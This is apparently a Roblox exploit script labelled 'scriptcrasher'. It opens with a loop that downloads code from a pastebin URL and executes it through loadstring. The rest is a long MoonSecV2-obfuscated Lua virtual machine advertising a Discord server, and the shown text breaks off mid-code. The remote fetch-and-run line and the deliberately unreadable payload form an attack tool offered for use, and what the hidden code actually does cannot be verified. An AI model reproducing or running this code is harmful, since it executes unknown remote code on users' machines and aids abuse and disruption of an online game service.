spawn(function() --scriptcrasher
    getgenv().linkspammer1 = false
        while linkspammer1 do
            pcall(function()
                loadstring(game:HttpGet("https://pastebin.com/raw/4CHnND3T", true))()
            end)
        wait()
    end
end)


_, Protected_by_MoonSecV2, Discord = 'discord.gg/gQEH2uZxUk'


,nil,nil;(function() _msec=(function(e,l,d)local z=l[(17472/(-75+0x10b))];local X=d[e[(75710/0x71)]][e[((0x683-884)+-56)]];local r=(-39+0x2b)/(120-(0x30dc/((0x4508+-76)/0xa6)))local _=((18745/(0xc9+-38))-113)-(66+-0x41)local J=d[e[(18720/0x75)]][e[(0x7f38/118)]];local y=(102-(0xe0-(2583/0x15)))+(89-0x57)local g=d[e[(-102+0x2b3)]][e[(0x2f3dc/225)]]local o=(124-0x7a)-(107-((-84+0x46b8)/170))local E=(0x60/(-34+((0x428b-8567)/146)))local V=(0x4a-(0xfdc/((21983-(11127+-0x6a))/189)))local p=((0x8e+((32/0x4)+-81))-0x41)local N=(-0x66+(0xe4-(238+(-0x49dc/163))))local m=(76-(109+(-0x22b0/(498-0x102))))local Y=((-161-(-37-(-99+0x64)))+127)local k=(0x23-(0x1ce0/(522-(0x2b4-401))))local s=(0x120/((-0x61+(32-0x3c))+0xdd))local f=(0x7d-((0x243-(0x13b2a/238))+-118))local c=((((489-0x10f)+-121)-60)+-34)local u=((((0x2bd2-5625)-2849)/0x62)-0x19)local t=(83+(-0x7a-((-2320/0x3a)-2)))local i=(184/(208-(180+(-0x27c0/159))))local v=(0x43-(-48+((0x1c2+-113)-224)))local b=(114/(((-0x525114/(36708/0xa1))/239)+156))local j=(0x69+((-51850-(-0x7b+-25771))/0xfc))local h=(81-(((-0x4cfe/(-120+0x153))+0x143)-0x9a))local w=((1344/((287+-0x59)-134))-0x13)local C=e[(-0x1a+1346)];local L=d[e[(0x101+-97)]][e[(42098/0x61)]];local O=d[(function(e)return type(e):sub(1,1)..'\101\116'end)('_#.%%^*.')..'\109\101'..('\116\97'or'$*/^&%;}')..e[(0x285+-56)]];local B=d[e[(126046/0xd6)]][e[(0x792-984)]];local F=(-117+0x77)-(34-(188-(424-0x10c)))local P=((122-(0xcd+-117))-32)-(358/0xb3)local Q=d[e[(0x167-199)]][e[(0x2e5-424)]];local l=function(l,e)return l..e end local W=(117+-0x71)*((-6188/(201-0x85))+0x5f)local K=d[e[((-44+0x3f6ff)/223)]];local x=(142/0x47)*(((-33+0x5b7d21)/222)/211)local G=(0x843-1091)*((((-5167+0xa03)/62)+240)/0x63)local T=(0xa8+(-15892/(-36+0xad)))local M=(0xba/((655-(-94+0x1e1))-175))*(0x1f2/249)local S=d[e[(-0x42+1077)]]or d[e[(-70+0x293)]][e[(-0x42+1077)]];local a=((1354-(0x1076c/92))-0x16d)local e=d[e[(61965/0x33)]];local B=(function(a)local x,d=1,0x10 local l={j={},v={}}local n=-o local e=d+_ while true do l[a:sub(e,(function()e=x+e return e-_ end)())]=(function()n=n+o return n end)()if n==(W-o)then n=""d=F break end end local n=#a while e<n+_ do l.v[d]=a:sub(e,(function()e=x+e return e-_ end)())d=d+o if d%r==F then d=P B(l.j,(Q((l[l.v[P]]*W)+l[l.v[o]])))end end return g(l.j)end)("..:::MoonSec::..!*%&/+^,;.:_#$}=.*/+=__*^,*$$&;./,=+:_^*//$.;&&.}=!._%+%&$}:,,&#**.;/#!#$:_/}^../=!+%}}^;.#*.&/.==_+^_%*#,##.$==:=^+*_//=_:=+#*,#^.=#_;*&,}$:&+.,=!+:;&+},.$+&^_&;}..!^;._/$!&_.$%;$&#!&,/=$_&^.*==,;_/*=,_=_+*.$%;+&#=*:,+$*&}!,=&;}_:/+,!}#&,=^_}+.}+*!#_$,/%.}!.+/=!%_,^$%&$};=/^=__+^;*$$&;./,=+:#^*%.*=;&&#}=:^+_**#,,$/:}.:%++!}#*,;%$}&_^/=!;__,&%,$$.&+_*}_+^}%*$:;$/&=.#*_!*_$+;,/+=&:.+=%,#_;*&#}$:^+.!=#+,_&*},:&+&!._=,+%_=&.,/$!:_.,%%+$_.*/_=$_&^}*==&;_/%=,:$:,*.$;;+&==*:,+$%+$/,=&=}_:++,!$#&..%=}+:++***_$,:%.==.+/_!#_,^$%&$_;=/+=__*,/*$$_;.&==+:_^**,$_;&/*}=:++_**#,,$&}}.:$++!$#*.,%$}&://=*!__,,%,$$.&/.!:_+^$%*$.;$/&=.:=,!*_$#;,/!=&#.+=*+$^;*/%}$:;+.!=#+,_&_},.=+&!__=,+%_}*._/$!#_.,.%+$_.*/,!^_&^#*=$,;_^*=,:$^^*.$;;+/!=*:_^^*&#},=/&}_:%+,*=*+,.&/}+.#+*!,_$,&&&$=.:/_!%_,,*%&$.:#/+==_*^.*$$&;.&=&,:_^**,#};&&.}=:;+#**#,,$&&}..=++!_#*,,%$}:../=!+__,*%,$$.&/:==_+^_%*$,;$/&=.:=^+*_$*;,&$=&:.+=*+#_;*&,}$:&+.!=#+,}&*},.$+&!._=,+%_}*.,/$!&_.^=%+$_.*/.=$_&^.*=$+;_/*=,:}^&*.#=;+&$=*:,+$.:#},=&+}_**_:^}%=}+&%}+._+*!,_$,&%.$=_%/_!*_,,=/%$..*/+=$_*^,*$}+:;&==;:_^&*,#$;&/_/*:++=**#;,$&&}.:+:*!_#^,,%$}&.:/=!.__,*/;$$.&/.!*_+^_%*$,:}/&=.:=^+*_$*;,&$*/:.+=*+#};*&,}$:&,:!=#+,_&%},.$+&!.#=,+%=}*../$!/_.,+/.$_.*/,*^_&^:*=$^;_/+=;:$^&*.};;+&#=*:$;**&#.,=/}}_:%+,!}#&,$&!}+._+*%!_$,/%.}+_$/_!%_,,$%&$:;=/+=__+^;*$$&;./==+:#^**_#};&&.}=_}+_*%#,,$+}}.:&++!$#*,:%$}&#//=!:__,/%,$=.&/=%&_+^=%*=!;$//=._/^+*=$%;,&$=&#%+=*^#_;*^%}$:,+.**#+,}&*},#;+&!}_=,;%_}&.,+&%,_.,&%+=/.*/;=$_;^.%&$^;_/*=,#^^&*:#=;.&#=*:,+$%$#.;!&+}_:}+,**#&,.%=}+._+**&_$,,%.}!.+/_!*_,;:%&$$;=/,=__*^,*$*+;.&==+:#^**,#$;++*}=:++_^_$*,$&&}.=}_/,}%^$::%++=}_/,^/%,_%,$$.&_+^}*^#=.//_==:#^,*^_=*}$*;,&$&:*}#;.#$%;*&,}$=&#+,!&}}!:&+:,}^,!._=,+.&++!__$&$};.};^/_=:,+^^%&$%;+/}_._!^.*/_$*.#=;+&_:+_&+$*&#.}&;#%#*,#/+**^}_,%%^}^_/^%}:,#%.$=.+._^$*;}^;;/_$^_:^/^;^,*$$&;.&==+#=:**,!*;&&.}==_:_+=},}#:+!.=%#+;/}*$_.%+,=}_%,.%!$+/;=}_&.$,/%,$./*/!!*^&^;*+#_&_/+=^+$^;*##/&+&=}..#!$*^_#;*%}}_:+*+.$+:!._=,+,&++!__$/:*}}&+%}^.*/,=$==$;;%&^=,.*^&!}$#,}/*&.+!=*:,+$,,&%=%.;+:*&__&_%:}!+}/#}#.^/=}=};;&+,}:_^+__;^$%&$.}}/+!#_*^,*$&_=$_&^+*}._/^=#}#.$+/*&#=&=&/}%^%/&:%++!_#*#/;!%:=&;.!+__,*,$%$}*^.^}%,;_,//,!^^&+$*/$.;!&/=_:%+,#:;!&+$+:*;_^%*+#,%=%}}=+*+^!&_.%.%+}/.$!*!:_%^^%}}*;}/=!:^,^$%;$_;=//=}:^^:$_^&*$#=;+&_+;!;#:,;::;&&+}_:*#}^}%#}$}&&$._+*!,%+},.$/=!;;+&!}^$=;/+!_$:#^/%+#=.%&+=}_%+:*$#/;^&_=,.}+$*.;.,/&^}:^%+^*;#*^#%+}^.^+^=__;^#}:$}.#/.=/:$^}*}$}.&&#}}:=^+%;#,;/&;_^::+/*%#$//&,}%._+#*^#%,#&:},.%+_!##+^=&*}/.;/}=#,:!,_.^=%+%&!!_/^%&:^$*=$+;_.++#%+$,/^$,;+&_=*!!#.,=%&}^:,//!/:*!$#&,.&*=/._+*!,_},&%.$=:,+#!*_,^$%/$.;=/+=__*^,*$$&;.&==+:_^**,#$;/&.}=:++_**$.,$&&}:.=+#!_#*,,&=}&..+!!+#:,*%,$$_./.==_^^_%:$,;}/&!,:=^.*#$*;,&$=#:.^!*+#=;%&,}$:&^&!=#^,_&*%..$+&!.#!,+%_}*..+#!&_:^=%+$_.*/,!=_^^.%!$+:&/*=,:$,+*.#=;^&_!/:,+$*&}.,=&+}#:*+;!$#=,./*}+._+/!,#%,&%.$=.+/_!*_;^$%^$..*/+%*_*^,*}$&.#&==^:_^.*,$*;/&.}=:+^}**#;,$&,}:.=++!_};,,%}}&:_:*!+_#,*&:$$.&/.*=!+^_%%$,;}/&=$:=;+*_$*;;&$=/:.^#*+}_;*&,}}:&+:!=#},_+*},.$+/!.#!,+%}}*_,/$!&_:^=%^$_:,/,*$_&^.%!$+;#/*!;:$.&*.#=;^&_!;:,^;*&$_,=&+}#:*^_!$#&,./*}+._+&!,#,,&%.$=.+/_!*_;^$%+$..!/+!$!&^,*}$&.#&==+:_;*^+#$;/&.=!:++=**},,$&&}:.=+^!_#},,/$}&..+!!+_#,*&!$$_&/.==_^^_%%$,.!/&*.:=^+*#$*;;&$!.:.,=*+#_;%&,}}:&^:!==+,_&*};.$^:!.#+,+%_}*.,/$!&_:^=%+$_:&..=$_/^.&%$+;_/**,$&^&*:#=;^&_=$:,^=&%#.;%&+=_:*+,!$#&,=%=}^._+/!,_=,&/==/.+/#!*}+^$%/$..,/+==_%^,*$$&_,&==^:_^+*;#$;&&.&!:++#**$.#=&&}:.=^;!_#*,,/$&&..+!!+_#,*%_$$_&/.==_^^_%%$,.:/&*.:=^+*#$*;;&$=#:.,=*+#_;%&,}}:&+#!=}+,_&*};.$+/!.$+,+/_}*.,/}!&_:^=&^$_#*/,=$_/^.&^$+.$/*!.:$^&*:#=..&_=*:,^=*&#.;*&+=+:*+,!$#&,.%=}^._+&!,_},&&_&*.+/#!*#:^$%&$.:=;/=__%^,*}$&;$&=*+:_^**;#$;/&.=#:+,_**#,,}&&}:.=+}!_}*,,%$}/..+!!+_},*/,$$.&/:==_^^_&,$,:$/&=._!^+*#$*.;&$%&:.+=*^#_.;&,=&:&^_^*#+,#&*}..$+&!.$*:}%_}&.,^!!&_.^=/+$_.*/.=$_+^.%_$+.$/*=,_*^&%}#=;+&_=*:,+$*;#.;!&+}_:*+,!$#&,_%=}:._+*!,_$,&%.}!.+/_!*_.^$%&$.;=/^=__%^,*}$&;.&==+:_^**;#$;&&.}=");local g=(6364/0x56)local d=113 local n=o;local e={}e={[(-77+0x4e)]=function()local _,l,o,e=J(B,n,n+y);n=n+M;d=(d+(g*M))%a;return(((e+d-(g)+x*(M*r))%x)*((r*G)^r))+(((o+d-(g*r)+x*(r^y))%a)*(x*a))+(((l+d-(g*y)+G)%a)*x)+((_+d-(g*M)+G)%a);end,[(332/0xa6)]=function(e,e,e)local e=J(B,n,n);n=n+_;d=(d+(g))%a;return((e+d-(g)+G)%x);end,[(0xc0/64)]=function()local e,l=J(B,n,n+r);d=(d+(g*r))%a;n=n+r;return(((l+d-(g)+x*(r*M))%x)*a)+((e+d-(g*r)+a*(r^y))%x);end,[(72/0x12)]=function(l,e,d)if d then local e=(l/r^(e-o))%r^((d-_)-(e-o)+_);return e-e%o;else local e=r^(e-_);return(l%(e+e)>=e)and o or P;end;end,[(0x54+-79)]=function()local l=e[(49/0x31)]();local d=e[(0x56-85)]();local c=o;local n=(e[(948/0xed)](d,_,W+M)*(r^(W*r)))+l;local l=e[(46-(0x9e+-116))](d,21,31);local e=((-o)^e[(504/0x7e)](d,32));if(l==P)then if(n==F)then return e*P;else l=_;c=F;end;elseif(l==(x*(r^y))-_)then return(n==P)and(e*(_/F))or(e*(P/F));end;return X(e,l-((a*(M))-o))*(c+(n/(r^T)));end,[(594/(220-0x79))]=function(l,r,r)local r;if(not l)then l=e[(124-0x7b)]();if(l==P)then return'';end;end;r=L(B,n,n+l-o);n=n+l;local e=''for l=_,#r do e=C(e,Q((J(L(r,l,l))+d)%a))d=(d+g)%x end return e;end}local function G(...)return{...},K('#',...)end local function B()local h={};local n={};local l={};local w={h,n,nil,l};local d={}local u=(14910/0xd5)local a={[(0x16-20)]=(function(l)return not(#l==e[(66+-0x40)]())end),[(117/0x27)]=(function(l)return e[(510/0x66)]()end),[(-54+0x36)]=(function(l)return e[(62-0x38)]()end),[(0x52-78)]=(function(l)local d=e[(954/0x9f)]()local l=''local e=1 for n=1,#d do e=(e+u)%a l=C(l,Q((J(d:sub(n,n))+e)%x))end return l end)};for e=_,e[(-34+0x23)]()do n[e-_]=B();end;local l=e[(-0x29+42)]()for l=1,l do local e=e[(0x2b-41)]();local n;local e=a[e%(0x110d/97)];d[l]=e and e({});end;for a=1,e[(0xad/173)]()do local l=e[(116+-0x72)]();if(e[(300/0x4b)](l,o,_)==F)then local x=e[(0x86-130)](l,r,y);local n=e[(0x67-99)](l,M,r+M);local l={e[(348/0x74)](),e[(0x32-47)](),nil,nil};local c={[(0x38-(0x8a-82))]=function()l[k]=e[(-0x1c+31)]();l[m]=e[(0x213/177)]();end,[(0x15+-20)]=function()l[t]=e[(29-0x1c)]();end,[(89+-0x57)]=function()l[k]=e[(118/0x76)]()-(r^W)end,[((0x2274/98)-0x57)]=function()l[c]=e[(-75+0x4c)]()-(r^W)l[E]=e[(756/0xfc)]();end};c[x]();if(e[(512/0x80)](n,_,o)==_)then l[b]=d[l[i]]end if(e[(0x87-131)](n,r,r)==o)then l[s]=d[l[f]]end if(e[(0x25+-33)](n,y,y)==_)then l[m]=d[l[V]]end h[a]=l;end end;w[3]=e[(108+-0x6a)]();return w;end;local function P(e,M,g)local W=e[r];local d=e[y];local e=e[o];return(function(...)local a=d;local B={...};local Q={};local y=-_;local d={};local F={};local J=G local x=e;local G=K('#',...)-_;local n=o;local W=W;for e=0,G do if(e>=a)then Q[e-a]=B[e+_];else d[e]=B[e+o];end;end;local e=G-a+o local e;local a;while true do e=x[n];a=e[(76-0x4b)];l=(3319984)while a<=(0x7c-83)do l=-l l=(8764560)while(0x97-131)>=a do l=-l l=(3399770)while(-121+0x82)>=a do l=-l l=(4489722)while a<=(0x84/33)do l=-l l=(1898180)while a<=(0x56+-85)do l=-l l=(5912442)while a>(52-0x34)do l=-l n=e[t];break end while(l)/((2925+-0x1f))==2043 do d[e[v]]=M[e[c]];n=n+o;e=x[n];d[e[j]]=#d[e[c]];n=n+o;e=x[n];M[e[c]]=d[e[w]];n=n+o;e=x[n];d[e[w]]=M[e[k]];n=n+o;e=x[n];d[e[h]]=#d[e[t]];n=n+o;e=x[n];M[e[c]]=d[e[i]];n=n+o;e=x[n];do return end;break end;break;end while(l)/((-115+0x4a1))==1774 do l=(5670000)while a<=(125-0x7b)do l=-l local l=e[w]local n,e=J(d[l](S(d,l+1,e[k])))y=e+l-1 local e=0;for l=l,y do e=e+o;d[l]=n[e];end;break;end while(l)/((3218+-0x44))==1800 do l=(492280)while(0x60-93)<a do l=-l d[e[h]]={};break end while 310==(l)/((0x240e4/93))do local a;local l;g[e[f]]=d[e[b]];n=n+o;e=x[n];d[e[j]]=g[e[u]];n=n+o;e=x[n];l=e[i];a=d[e[f]];d[l+1]=a;d[l]=a[e[N]];n=n+o;e=x[n];d[e[w]]=e[s];n=n+o;e=x[n];l=e[b]d[l]=d[l](S(d,l+o,e[s]))n=n+o;e=x[n];if(d[e[w]]~=e[V])then n=n+_;else n=e[u];end;break end;break;end break;end break;end while(l)/((2215-0x45d))==4089 do l=(3600000)while(156/0x1a)>=a do l=-l l=(5714476)while a>(0x63+-94)do l=-l local l=e[w]d[l]=d[l](S(d,l+o,e[t]))break end while 3334==(l)/((0x6d9+-39))do local n=e[h];local l=d[e[u]];d[n+1]=l;d[n]=l[e[N]];break end;break;end while 3200==(l)/((2373-(-113+0x551)))do l=(6881016)while(0x3a-(0x1c7d/143))>=a do l=-l d[e[h]]=g[e[c]];break;end while 2103==(l)/((0xd2f+-103))do l=(5470740)while((-0x2e+934)/111)<a do l=-l local l=e[v];local a=d[l+2];local o=d[l]+a;d[l]=o;if(a>0)then if(o<=d[l+1])then n=e[c];d[l+3]=o;end elseif(o>=d[l+1])then n=e[f];d[l+3]=o;end break end while(l)/((0x2e51e/103))==2970 do local e=e[i]d[e]=d[e](S(d,e+o,y))break end;break;end break;end break;end break;end while(l)/((-40+0x40d))==3410 do l=(6815910)while(-63+0x4d)>=a do l=-l l=(4754344)while(0x1e4/44)>=a do l=-l l=(2489214)while a>((-2405/0x25)+75)do l=-l local y;local a;local M;local l;d[e[b]]=g[e[s]];n=n+o;e=x[n];d[e[h]]=d[e[u]][e[N]];n=n+o;e=x[n];l=e[v];M=d[e[k]];d[l+1]=M;d[l]=M[e[Y]];n=n+o;e=x[n];d[e[v]]=d[e[t]];n=n+o;e=x[n];d[e[h]]=d[e[t]];n=n+o;e=x[n];l=e[j]d[l]=d[l](S(d,l+o,e[f]))n=n+o;e=x[n];l=e[b];M=d[e[f]];d[l+1]=M;d[l]=M[e[m]];n=n+o;e=x[n];l=e[i]d[l]=d[l](d[l+_])n=n+o;e=x[n];a={d,e};a[_][a[r][b]]=a[o][a[r][E]]+a[_][a[r][k]];n=n+o;e=x[n];d[e[i]]=d[e[f]]%e[E];n=n+o;e=x[n];l=e[h]d[l]=d[l](d[l+_])n=n+o;e=x[n];M=e[c];y=d[M]for e=M+1,e[V]do y=y..d[e];end;d[e[h]]=y;n=n+o;e=x[n];a={d,e};a[_][a[r][w]]=a[o][a[r][N]]+a[_][a[r][u]];n=n+o;e=x[n];d[e[b]]=d[e[c]]%e[N];break end while(l)/((0xa1ffa/181))==679 do d[e[h]][d[e[u]]]=d[e[N]];break end;break;end while 1163==(l)/((0xc99b0/202))do l=(497274)while a<=(0x85-(0x1e4/4))do l=-l d[e[w]]=(e[f]~=0);break;end while 1237==(l)/((74370/0xb9))do l=(4690224)while a>(135-0x7a)do l=-l d[e[b]]=#d[e[s]];break end while(l)/((0x2b5fc/105))==2772 do d[e[b]]=(e[s]~=0);n=n+_;break end;break;end break;end break;end while 2010==(l)/((0x68502/126))do l=(11960054)while a<=(799/0x2f)do l=-l l=(1872010)while a<=(-28+0x2b)do l=-l d[e[h]]=P(W[e[c]],nil,g);break;end while(l)/((1157-0x24c))==3290 do l=(1592591)while a>(0xdd0/221)do l=-l g[e[k]]=d[e[j]];n=n+o;e=x[n];d[e[w]]={};n=n+o;e=x[n];d[e[i]]={};n=n+o;e=x[n];g[e[c]]=d[e[j]];n=n+o;e=x[n];d[e[b]]=g[e[k]];n=n+o;e=x[n];if(d[e[v]]==e[N])then n=n+_;else n=e[t];end;break end while(l)/((6754-0xd3b))==473 do local e=e[h]d[e](d[e+_])break end;break;end break;end while 3583==(l)/((6785-0xd77))do l=(207020)while(0x37+(0x1a-63))>=a do l=-l d[e[v]][e[u]]=e[N];break;end while(l)/((-0x34+107))==3764 do l=(7570588)while(0x40+-45)<a do l=-l d[e[w]]=d[e[f]][e[p]];break end while 2698==(l)/((-47+0xb25))do d[e[b]]=M[e[t]];break end;break;end break;end break;end break;end break;end while 2590==(l)/((3469+-0x55))do l=(5961384)while(0x6b+-77)>=a do l=-l l=(1819730)while(-71+0x60)>=a do l=-l l=(5976688)while a<=(0xf2/11)do l=-l l=(7566920)while(-22+0x2b)<a do l=-l d[e[b]]=e[c];break end while 2020==(l)/((284696/0x4c))do if(d[e[w]]~=e[N])then n=n+_;else n=e[k];end;break end;break;end while 3427==(l)/((76736/0x2c))do l=(2305551)while(0x51+-58)>=a do l=-l d[e[i]]=d[e[c]][d[e[V]]];break;end while(l)/((282260/0xdc))==1797 do l=(1215586)while a>(161-0x89)do l=-l d[e[j]]=d[e[t]][d[e[m]]];break end while 2311==(l)/((0x448-570))do local l=e[w]local n,e=J(d[l](S(d,l+1,e[t])))y=e+l-1 local e=0;for l=l,y do e=e+o;d[l]=n[e];end;break end;break;end break;end break;end while(l)/((0xf72+-49))==466 do l=(5918962)while(0x6f+-84)>=a do l=-l l=(6775242)while a>(3380/0x82)do l=-l d[e[i]]=M[e[c]];break end while(l)/((43333/0x11))==2658 do d[e[h]][d[e[s]]]=d[e[N]];break end;break;end while(l)/((-0x11+1795))==3329 do l=(14290980)while a<=(0x4b-47)do l=-l local l=e[w];local a=d[l+2];local o=d[l]+a;d[l]=o;if(a>0)then if(o<=d[l+1])then n=e[k];d[l+3]=o;end elseif(o>=d[l+1])then n=e[c];d[l+3]=o;end break;end while(l)/((0x835e0/152))==4037 do l=(12040971)while((0x626-820)/0x1a)<a do l=-l d[e[i]]();break end while 3863==(l)/((514305/0xa5))do do return d[e[h]]end break end;break;end break;end break;end break;end while 3432==(l)/((-85+0x71e))do l=(2456031)while(-69+0x68)>=a do l=-l l=(831040)while(2304/0x48)>=a do l=-l l=(751740)while a>(6913/0xdf)do l=-l local e=e[h]d[e]=d[e](d[e+_])break end while 330==(l)/((-30+0x904))do d[e[b]]=e[f];break end;break;end while 265==(l)/(((0x31c5-6415)-0xc76))do l=(1386312)while(0x17d9/185)>=a do l=-l d[e[j]]=d[e[u]];break;end while 1128==(l)/((0x4e7+-26))do l=(14753232)while(0x96-116)<a do l=-l local n=e[s];local l=d[n]for e=n+1,e[p]do l=l..d[e];end;d[e[i]]=l;break end while(l)/((3909+-0x3d))==3834 do d[e[h]]=#d[e[f]];break end;break;end break;end break;end while(l)/((1473-0x2ee))==3397 do l=(3980025)while a<=(84+-0x2e)do l=-l l=(12968710)while(0x288/18)>=a do l=-l if(d[e[i]]==d[e[E]])then n=n+_;else n=e[u];end;break;end while(l)/((-0x65+3466))==3854 do l=(1801335)while a>((-118+0x123)-0x88)do l=-l local l=e[i];local n=d[e[t]];d[l+1]=n;d[l]=n[e[m]];break end while(l)/((0x2ab+(-60+-0x8)))==2929 do local e=e[w]d[e]=d[e](d[e+_])break end;break;end break;end while 1995==(l)/((4068-0x819))do l=(4817780)while(0xa4-125)>=a do l=-l d[e[w]]=d[e[s]]%e[E];break;end while 2684==(l)/((-25+0x71c))do l=(5797806)while(0x6f-71)<a do l=-l if(d[e[j]]~=d[e[m]])then n=n+_;else n=e[u];end;break end while 3782==(l)/((0x1077c/44))do if(d[e[h]]~=d[e[m]])then n=n+_;else n=e[u];end;break end;break;end break;end break;end break;end break;end break;end while(l)/((198588/0x9c))==2608 do l=(3000980)while(-49+0x6f)>=a do l=-l l=(7359156)while a<=(177+-0x7e)do l=-l l=(5529524)while(0x66+-56)>=a do l=-l l=(3519424)while(0x23c7/213)>=a do l=-l l=(178901)while((721/0x7)-0x3d)<a do l=-l d[e[i]]=d[e[u]]-d[e[V]];break end while 899==(l)/((43382/0xda))do local e={d,e};e[_][e[r][i]]=e[o][e[r][Y]]+e[_][e[r][u]];break end;break;end while(l)/((0x7f00/8))==866 do l=(2876493)while(0xa6-122)>=a do l=-l d[e[h]]=(e[u]~=0);break;end while 1549==(l)/((0x137eb/43))do l=(9291794)while(77+-0x20)<a do l=-l do return d[e[b]]end break end while 2962==(l)/((-0x40+3201))do if(d[e[j]]~=e[E])then n=n+_;else n=e[s];end;break end;break;end break;end break;end while(l)/((468468/0xea))==2762 do l=(1622814)while a<=(-126+0xae)do l=-l l=(2583799)while(157-0x6e)<a do l=-l g[e[k]]=d[e[b]];break end while(l)/((4794-(0x800c9/217)))==1087 do d[e[v]]=d[e[c]]-d[e[Y]];break end;break;end while(l)/((128880/0x78))==1511 do l=(8135496)while(10682/0xda)>=a do l=-l d[e[v]]=d[e[t]]%e[E];break;end while(l)/((0x13f8-2608))==3249 do l=(4864665)while((-0x41+204)+-0x59)<a do l=-l do return end;break end while(l)/((0x1945-3258))==1515 do d[e[h]]();break end;break;end break;end break;end break;end while 3021==(l)/((4954-0x9d6))do l=(4748712)while a<=(155+-0x63)do l=-l l=(1268865)while a<=(95+-0x2a)do l=-l l=(7215348)while(0xaf-123)<a do l=-l if(d[e[h]]==e[Y])then n=n+_;else n=e[f];end;break end while 3506==(l)/((220206/0x6b))do local l=e[w]d[l]=d[l](S(d,l+o,e[c]))break end;break;end while 585==(l)/((0x7370a/218))do l=(14015720)while a<=(-64+0x76)do l=-l n=e[u];break;end while 3937==(l)/((875760/0xf6))do l=(1769666)while((308-0xae)-79)<a do l=-l local e=e[i]d[e]=d[e](S(d,e+o,y))break end while(l)/((141036/0x54))==1054 do g[e[k]]=d[e[v]];break end;break;end break;end break;end while 1356==(l)/((0x1bc6-3608))do l=(3958080)while a<=(-64+0x7b)do l=-l l=(5289432)while(160-0x67)>=a do l=-l local a;local h,r;local _;local l;d[e[w]]=g[e[c]];n=n+o;e=x[n];l=e[v];_=d[e[c]];d[l+1]=_;d[l]=_[e[m]];n=n+o;e=x[n];d[e[i]]=e[f];n=n+o;e=x[n];d[e[i]]=(e[f]~=0);n=n+o;e=x[n];l=e[v]h,r=J(d[l](S(d,l+1,e[c])))y=r+l-1 a=0;for e=l,y do a=a+o;d[e]=h[a];end;n=n+o;e=x[n];l=e[b]d[l]=d[l](S(d,l+o,y))n=n+o;e=x[n];d[e[v]]();n=n+o;e=x[n];do return end;break;end while(l)/((7343-0xe92))==1464 do l=(1889505)while(136+-0x4e)<a do l=-l local a=W[e[k]];local o;local l={};o=O({},{__index=function(d,e)local e=l[e];return e[1][e[2]];end,__newindex=function(n,e,d)local e=l[e]e[1][e[2]]=d;end;});for o=1,e[E]do n=n+_;local e=x[n];if e[(-24+0x19)]==33 then l[o-1]={d,e[t]};else l[o-1]={M,e[c]};end;F[#F+1]=l;end;d[e[w]]=P(a,o,g);break end while(l)/((119004/0xbc))==2985 do local e=e[h]d[e](d[e+_])break end;break;end break;end while(l)/((2747-0x57b))==2945 do l=(4238520)while(216-0x9c)>=a do l=-l if not d[e[i]]then n=n+_;else n=e[k];end;break;end while(l)/(((0x8206b-266321)/0x62))==1560 do l=(9245142)while(0xb3-118)<a do l=-l if(d[e[v]]==e[m])then n=n+_;else n=e[u];end;break end while(l)/(((-109+0x12)+3673))==2581 do if(d[e[v]]==d[e[V]])then n=n+_;else n=e[t];end;break end;break;end break;end break;end break;end break;end while 3316==(l)/((0x2e662/210))do l=(10944)while a<=(0x107-191)do l=-l l=(1587520)while a<=((557-0x146)-0xa4)do l=-l l=(360180)while a<=(-0x1b+91)do l=-l l=(6616181)while(184+-0x79)<a do l=-l local n=e[s];local l=d[n]for e=n+1,e[m]do l=l..d[e];end;d[e[w]]=l;break end while(l)/((7202-0xe3b))==1859 do d[e[j]]=d[e[s]][e[p]];n=n+o;e=x[n];d[e[b]]=d[e[k]][e[p]];n=n+o;e=x[n];d[e[w]]=d[e[c]][e[m]];n=n+o;e=x[n];d[e[w]]=d[e[k]][e[m]];n=n+o;e=x[n];d[e[b]]=d[e[f]][e[E]];n=n+o;e=x[n];d[e[j]]=d[e[t]][e[E]];n=n+o;e=x[n];d[e[b]][e[f]]=e[N];break end;break;end while(l)/((0x15b-212))==2668 do l=(4121887)while(0x2df5/181)>=a do l=-l M[e[f]]=d[e[w]];break;end while 1883==(l)/((0x8c6+-57))do l=(1127740)while a>(241-0xaf)do l=-l local l=e[v];local o=d[l]local a=d[l+2];if(a>0)then if(o>d[l+1])then n=e[c];else d[l+3]=o;end elseif(o<d[l+1])then n=e[c];else d[l+3]=o;end break end while 565==(l)/((4095-(264474/0x7e)))do do return end;break end;break;end break;end break;end while(l)/((0x3c0-509))==3520 do l=(143524)while(211-0x8e)>=a do l=-l l=(338416)while(0xf6-178)<a do l=-l local l=e[w];local o=d[l]local a=d[l+2];if(a>0)then if(o>d[l+1])then n=e[t];else d[l+3]=o;end elseif(o<d[l+1])then n=e[c];else d[l+3]=o;end break end while 208==(l)/((3271-0x66c))do d[e[b]]=d[e[s]];break end;break;end while 2708==(l)/((0x1c5d/137))do l=(6675345)while(0x32dc/(0x109+-79))>=a do l=-l M[e[f]]=d[e[b]];break;end while(l)/((2992+-0x25))==2259 do l=(2534416)while a>(0xee-167)do l=-l d[e[i]][e[f]]=e[E];break end while 1552==(l)/((142071/0x57))do d[e[i]]=(e[k]~=0);n=n+_;break end;break;end break;end break;end break;end while(l)/((0x4218/235))==152 do l=(47245)while(252-0xaf)>=a do l=-l l=(4183332)while a<=(0xc7+-125)do l=-l l=(2932184)while a>(0xb6-109)do l=-l d[e[i]]=P(W[e[c]],nil,g);break end while(l)/((0x1404-2620))==1171 do if not d[e[w]]then n=n+_;else n=e[k];end;break end;break;end while 2116==(l)/((77103/0x27))do l=(650835)while a<=(171-0x60)do l=-l local _;local a;local l;d[e[b]]=e[c];n=n+o;e=x[n];d[e[i]]=e[s];n=n+o;e=x[n];d[e[j]]=#d[e[c]];n=n+o;e=x[n];d[e[h]]=e[t];n=n+o;e=x[n];l=e[b];a=d[l]_=d[l+2];if(_>0)then if(a>d[l+1])then n=e[t];else d[l+3]=a;end elseif(a<d[l+1])then n=e[s];else d[l+3]=a;end break;end while(l)/((904-0x1f3))==1607 do l=(5624744)while(13604/0xb3)<a do l=-l d[e[w]]={};break end while 1576==(l)/((910095/0xff))do local r=W[e[t]];local a;local l={};a=O({},{__index=function(d,e)local e=l[e];return e[1][e[2]];end,__newindex=function(n,e,d)local e=l[e]e[1][e[2]]=d;end;});for o=1,e[V]do n=n+_;local e=x[n];if e[(137/0x89)]==33 then l[o-1]={d,e[f]};else l[o-1]={M,e[t]};end;F[#F+1]=l;end;d[e[w]]=P(r,a,g);break end;break;end break;end break;end while(l)/((-0x75+976))==55 do l=(478450)while a<=(-55+(0x150-201))do l=-l l=(4718250)while((605-0x16c)-0xa3)>=a do l=-l 